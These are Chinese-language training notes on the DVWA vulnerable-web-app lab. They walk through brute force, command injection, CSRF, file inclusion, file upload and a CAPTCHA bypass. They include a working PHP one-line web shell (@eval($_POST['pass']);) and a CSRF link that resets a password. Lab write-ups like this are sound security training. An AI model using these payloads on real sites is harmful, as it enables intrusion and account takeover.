DVWA 靶场笔记
DVWA 靶场笔记
Brute Force
登录框,Burp抓包,放到Intruder爆破即可,根据响应包的长度得到正确的密码

Command Injection
首先查看源码

请求参数 ip 会直接被拼接到 shell_exec 函数的 ping 命令中
通过构造恶意输入再传递给 shell_exec 函数,进行命令注入攻击

Cross Site Request Forgery (CSRF)
该页面的链接,点击后即可修改掉用户密码,没有任何校验

可以构造恶意网站,诱导受害者点击,即可修改TA的密码
1 | <a href="http://198.18.0.1/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#" /> |
File Inclusion
存在文件包含漏洞

尝试包含同路径的其他文件

成功包含

File Upload
上传PHP一句话木马
1 | @eval($_POST['pass']); |

蚁剑连上拿到shell

Insecure CAPTCHA
这里先创建Google reCAPTCHA

填入site key与secret key

审计源码可知,当CAPTCHA校验通过后,会进入到step2

Burp抓包修改为step=2即可绕过CAPTCHA校验修改掉密码



